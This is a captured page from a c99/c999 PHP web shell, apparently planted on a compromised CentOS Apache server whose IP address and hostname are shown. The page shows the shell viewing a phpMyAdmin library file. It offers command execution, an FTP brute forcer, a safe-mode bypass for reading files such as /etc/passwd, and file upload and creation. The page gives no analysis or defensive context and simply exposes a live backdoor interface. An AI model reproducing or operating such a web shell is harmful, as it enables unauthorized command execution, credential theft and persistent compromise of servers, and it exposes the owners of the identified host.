110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/libraries/ drwxr-xr-x Free 52.32 GB of 127.8 GB (40.93%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/ drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.93%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: sqlvalidator.lib.php (2.92 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

* http://www.orbis-terrarum.net/?l=people.robbat2 * * This function uses the Mimer SQL Validator service * from phpMyAdmin * * Copyright for Server side validator systems: * "All SQL statements are stored anonymously for statistical purposes. * Mimer SQL Validator, Copyright 2002 Upright Database Technology. * All rights reserved." * * All data is transported over HTTP-SOAP * And uses the PEAR SOAP Module * * Install instructions for PEAR SOAP * Make sure you have a really recent PHP with PEAR support * run this: "pear install Mail_Mime Net_DIME SOAP" * * Enable the SQL Validator options in the configuration file * $cfg['SQLQuery']['Validate'] = TRUE; * $cfg['SQLValidator']['use'] = FALSE; * * Also set a username and password if you have a private one */ // We need the PEAR libraries, so do a minimum version check first // I'm not sure if PEAR was available before this point // For now we actually use a configuration flag if ($cfg['SQLValidator']['use'] == TRUE) { require_once('./libraries/sqlvalidator.class.php'); } // if ($cfg['SQLValidator']['use'] == TRUE) /** * This function utilizes the Mimer SQL Validator service * to validate an SQL query * * * * @param string SQL query to validate * * @return string Validator result string * * @global array The PMA configuration array */ function PMA_validateSQL($sql) { global $cfg; $str = ''; if ($cfg['SQLValidator']['use']) { if (isset($GLOBALS['sqlvalidator_error']) && $GLOBALS['sqlvalidator_error']) { $str = sprintf($GLOBALS['strValidatorError'], '', ''); } else { // create new class instance $srv = new PMA_SQLValidator(); // Checks for username settings // The class defaults to anonymous with an empty password // automatically if ($cfg['SQLValidator']['username'] != '') { $srv->setCredentials($cfg['SQLValidator']['username'], $cfg['SQLValidator']['password']); } // Identify ourselves to the server properly... $srv->appendCallingProgram('phpMyAdmin', PMA_VERSION); // ... and specify what database system we are using $srv->setTargetDbms('MySQL', PMA_MYSQL_STR_VERSION); // Log on to service $srv->start(); // Do service validation $str = $srv->validationString($sql); } } // end if // Gives string back to caller return $str; } // end of the "PMA_validateSQL()" function ?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--